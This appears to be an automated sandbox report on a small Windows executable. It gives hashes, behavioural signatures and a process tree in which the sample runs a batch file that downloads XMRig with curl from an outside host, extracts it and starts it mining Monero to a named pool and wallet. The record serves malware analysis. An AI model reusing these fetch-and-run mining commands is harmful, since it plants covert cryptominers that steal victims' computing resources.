Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/03/2024, 21:08

240311-zy7ywsed31 10

11/03/2024, 21:06

240311-zx53xagd73 10

11/03/2024, 21:02

240311-zvwrfsec3x 10

11/03/2024, 21:01

240311-ztxx5aeb9x 10

11/03/2024, 20:59

240311-zs72psgc56 10

11/03/2024, 20:57

240311-zrmpdaeb3v 10

11/03/2024, 20:56

240311-zqzbsagb66 10

11/03/2024, 20:55

240311-zqlexsgb55 10

11/03/2024, 20:54

240311-zp4j4sgb43 10

11/03/2024, 20:53

240311-zplz3agb32 10

Analysis

  • max time kernel
    1794s
  • max time network
    1802s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    11/03/2024, 21:08

General

  • Target

    test - Copy (6).exe

  • Size

    6KB

  • MD5

    4634098fe194204dc03f967cc0b19cd6

  • SHA1

    eaa58619c6cea9f148cec61ee504cd727b3e80d8

  • SHA256

    a1070b8803e4243699a44a77e60a199282814495bc3bd94759c07021c0a6c70c

  • SHA512

    64e97fac56a25daf99f8ee1a9f480acc8020d5da4eb96ea77022c9170f6300b7b5479fce86e3e7e088cdaabdf123b65872e09b0ae17f8f97ea2fe58b6ecf7a9d

  • SSDEEP

    96:2Fb158Vgo4CVvAXklfZT8kYl9RxxgAVNb8ICcGKzNt:oMV1vAX+8kYDRxbLh4s

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\test - Copy (6).exe
    "C:\Users\Admin\AppData\Local\Temp\test - Copy (6).exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2084
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\b9GmnRco.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2844
      • C:\Windows\system32\curl.exe
        curl -o "C:\xmrig\xmrig-6.21.1-gcc-win64.zip" https://1488.netlify.app/xmrig-6.21.1-gcc-win64.zip
        3⤵
          PID:3316
        • C:\Windows\system32\tar.exe
          tar -xf "C:\xmrig\xmrig-6.21.1-gcc-win64.zip"
          3⤵
            PID:3680
          • C:\xmrig\xmrig-6.21.1\xmrig.exe
            C:\xmrig\xmrig-6.21.1\xmrig.exe --coin=XMR -o xmr.2miners.com:2222 -u 49QgS4Cu9uqVeqgDpwtdZWYZrDNrUJXfzDiGmwsZFLdEgQPAQV7SbswUHqZG3B45HAiSR1cYZoSvgC56kctnqsSjMNFnJmU.RIG -p x --cpu-affinity=5 --cpu-no-yield
            3⤵
            • Executes dropped EXE
            PID:4448
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3696 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
        1⤵
          PID:888
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=5940 --field-trial-handle=2256,i,6670388345726423024,18382795228658886258,262144 --variations-seed-version /prefetch:8
          1⤵
            PID:2308

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Temp\b9GmnRco.bat

            Filesize

            421B

            MD5

            67d11b392feb0ad59fc11ff3e79dfeee

            SHA1

            7df5785988cb76c4893773614572c93baaa18717

            SHA256

            69bcf6c4c959410d5857ac219600cec68035bd92e708c0bf7318eece8d5acb9d

            SHA512

            50835d7dccb22cbf052a64ce2dd50df97f726b1d2044ab0e55ba42a2874601b6fe064f84659f89ce079627d147cf49d9548b24b2160a17783b934c6793507f11

          • C:\xmrig\xmrig-6.21.1-gcc-win64.zip

            Filesize

            2.4MB

            MD5

            616a1111fbee1b4250d22a02bed70233

            SHA1

            2e5355a0c65e708951b848b7e66138a5eef09f32

            SHA256

            cc1656649a08a6fd2d5857f45f305e014a0ba9378157676100399df71e70faab

            SHA512

            a409b5d0f50abafde89792856e9f9b68d30bf107c1c8cbd9bba59a33f9b2871c1c02f7f98b8fd7680a791d866246685efaab0bb76fd6bfe6bc8dd465fc2a883e

          • C:\xmrig\xmrig-6.21.1\xmrig.exe

            Filesize

            6.8MB

            MD5

            2b24cf12349379042e5d6c0b21d386f7

            SHA1

            1961237c9a7c934ac2fce0250426cd85d29c1163

            SHA256

            5cd4ff825e4d872557ae263d97555c7d3a4e793e49373834606928384c3e8775

            SHA512

            302482b698caf7d3ab2ce84e6dfd8edc6fd612c22a69654e312703980e5dd4df584fdd01bdedd17019569a46e95f73557278dd4092b14c23b7e00063680fec8b

          • memory/2084-0-0x00000000004B0000-0x00000000004B8000-memory.dmp

            Filesize

            32KB

          • memory/2084-1-0x00007FF97B280000-0x00007FF97BD41000-memory.dmp

            Filesize

            10.8MB

          • memory/2084-7-0x00007FF97B280000-0x00007FF97BD41000-memory.dmp

            Filesize

            10.8MB

          • memory/2084-23-0x00007FF97B280000-0x00007FF97BD41000-memory.dmp

            Filesize

            10.8MB